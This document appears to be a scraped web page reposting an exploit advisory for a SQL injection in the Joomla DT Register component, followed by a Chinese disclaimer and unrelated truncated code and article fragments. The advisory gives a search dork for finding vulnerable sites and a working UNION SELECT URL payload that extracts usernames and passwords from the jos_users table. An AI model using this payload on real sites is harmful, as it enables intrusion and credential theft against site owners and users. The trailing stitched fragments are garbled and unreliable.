时间:2021-05-24
/---------------------------------------------------------------\
\ /
/ Joomla Component DT Register Remote SQL injection \
\ /
\---------------------------------------------------------------/
[*] Author : His0k4 [ALGERIAN HaCkeR]
[*] Dork : inurl:com_DTRegister eventId
[*] Vendor : http:///components/dt-register.html
[*] POC : http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId={SQL}
[*] Example : http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId=-12 UNION SELECT concat(username,0x3a,password) FROM jos_users&task=pay_options&Itemid=138
[*] Greetings : All friends & muslims HaCkeRs
----------------------------------------------------------------------------
声明:本页内容来源网络,仅供用户参考;我单位不保证亦不表示资料全面及准确无误,也不保证亦不表示这些资料为最新信息,如因任何原因,本网内容或者用户因倚赖本网内容造成任何损失或损害,我单位将不会负任何法律责任。如涉及版权问题,请提交至online#300.cn邮箱联系删除。
html:js:importVuefrom'vue'Vue.component('my-remote',{functional:true,render:func
影响版本:AWBS2.9.2 官方网站:http:// 漏洞类型:SQL注入 漏洞描述: ---Vulnerability--- http(s):
http://monClass.QuerySQL.GetDataTable(sql);if(dt.Rows.Count>0){}}}}}}以上内容是小编给大家介
本文实例讲述了Joomla调用系统自带编辑器的方法。分享给大家供大家参考,具体如下:调用Joomla系统带的编辑器:路径:/libraries/joomla/h
privatevoidDisplay(){dt=newTsOrganize().OrganizeDs();DataViewdv=newDataView(dt);